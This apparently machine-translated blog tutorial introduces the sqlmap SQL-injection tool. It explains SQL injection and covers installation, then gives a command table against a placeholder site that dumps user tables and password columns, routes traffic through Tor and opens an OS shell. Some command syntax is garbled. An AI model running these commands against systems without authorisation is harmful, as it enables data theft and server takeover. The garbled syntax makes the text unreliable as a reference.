In his space ethical hacking, SQLMAP is the predominant tool for finding vulnerabilities based on SQL injection. It is an open source solution written in python language that automates the process of finding and exploiting SQL vulnerabilities with the ultimate goal of fully controlling the database and server in which he is.
It includes several functions such as database fingerprinting, data collection and command line execution. Operating Systems. The SQLMAP tool can be used for the following purposes:
- Checking a web application for a SQL injection vulnerability
- Exploiting SQL injection vulnerability
- Extract data from the database and its users
- Override the Web Application Firewall (WAF)
- Full control of the base operating system
Some of the most important features of SQLMAP are shown below:
- It can support MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird and Sybase technologies.
- It also supports 6 different SQL injection techniques: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
- Supports finding hashed passwords using dictionary attack technique.
- Allows crawling of users, hashed passwords, roles, permissions, bases, tables and columns.
What is SQL injection?
SQL injection is a hacking technique where the attacker, by modifying it URL or some other character input field of the web application can insert SQL commands directly into the database. This results in overriding application security techniques and as a result the attacker can extract data from the entire database, modify it and even delete it.
It is one of the oldest and most dangerous attacks on web applications. OWASP (Open Web Application Security Project) ranks injection threats at number one on the list of Top 10 Web Application Security Threats (OWASP Top 10).
How to use it
The first step you should take is to download (if you don't already have it) the python interpreter - remember that the tool is written in python. You can download the latest version from here. (v 3.8.0).
After you have successfully completed the python installation, follow these steps:
- Download it zip file by website of SQLMAP.
- Unzip the folder and its contents to the desired location
- Open a cmd console and navigate to the location where you unzipped the folder from the previous step.
- Run the sqlmap.py command…. And see all your options.
- Are you ready
In almost all Linux distros Python is installed by default. If you're not sure, open a terminal and type python –version. If python is installed the above command will show you the version.
Then run the following commands to complete the installation of the tool:
|sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-devpython sqlmap.py
The last command will display on our screen something like the following:
How to use it
Here are some basic commands you can use with SQLMAP and their description:
|sqlmap -u “http://site.com/login.php”||Simple check for a specific URL|
|sqlmap -u “http://site.com/login.php” –tor –tor-type = SOCKS5||'Check using tor|
|sqlmap -u "http://site.com/login.php" -time-sec 20||Control by setting the time limit|
|sqlmap -u “http://site.com/login.php” –dbs||Option to return all databases of a web application|
|sqlmap -u “http://site.com/login.php” -D site_db –tables||Returning the contents of a specific database|
|sqlmap -u “http://site.com/login.php” -D site_db -T users –dump||Return the contents of a particular table|
|sqlmap -u “http://site.com/login.php” -D site_db -T users –columns||Return all columns in a table|
|sqlmap -u “http://site.com/login.php” -D site_db -T users -C username, password –dump||Return specific column content|
|sqlmap -u “http://site.com/login.php” –method “POST” –data “username = admin & password = admin & submit = Submit” -D social_mccodes -T users –dump||Return table when we have admin login information|
|sqlmap –dbms = mysql -u “http://site.com/login.php” –os-shell||Return to OS Shell|
|sqlmap –dbms = mysql -u “http://site.com/login.php” –sql-shell||SQL Shell Return|
You can find a more detailed cheetseat for SQLMAP here..
We look forward to your comments ...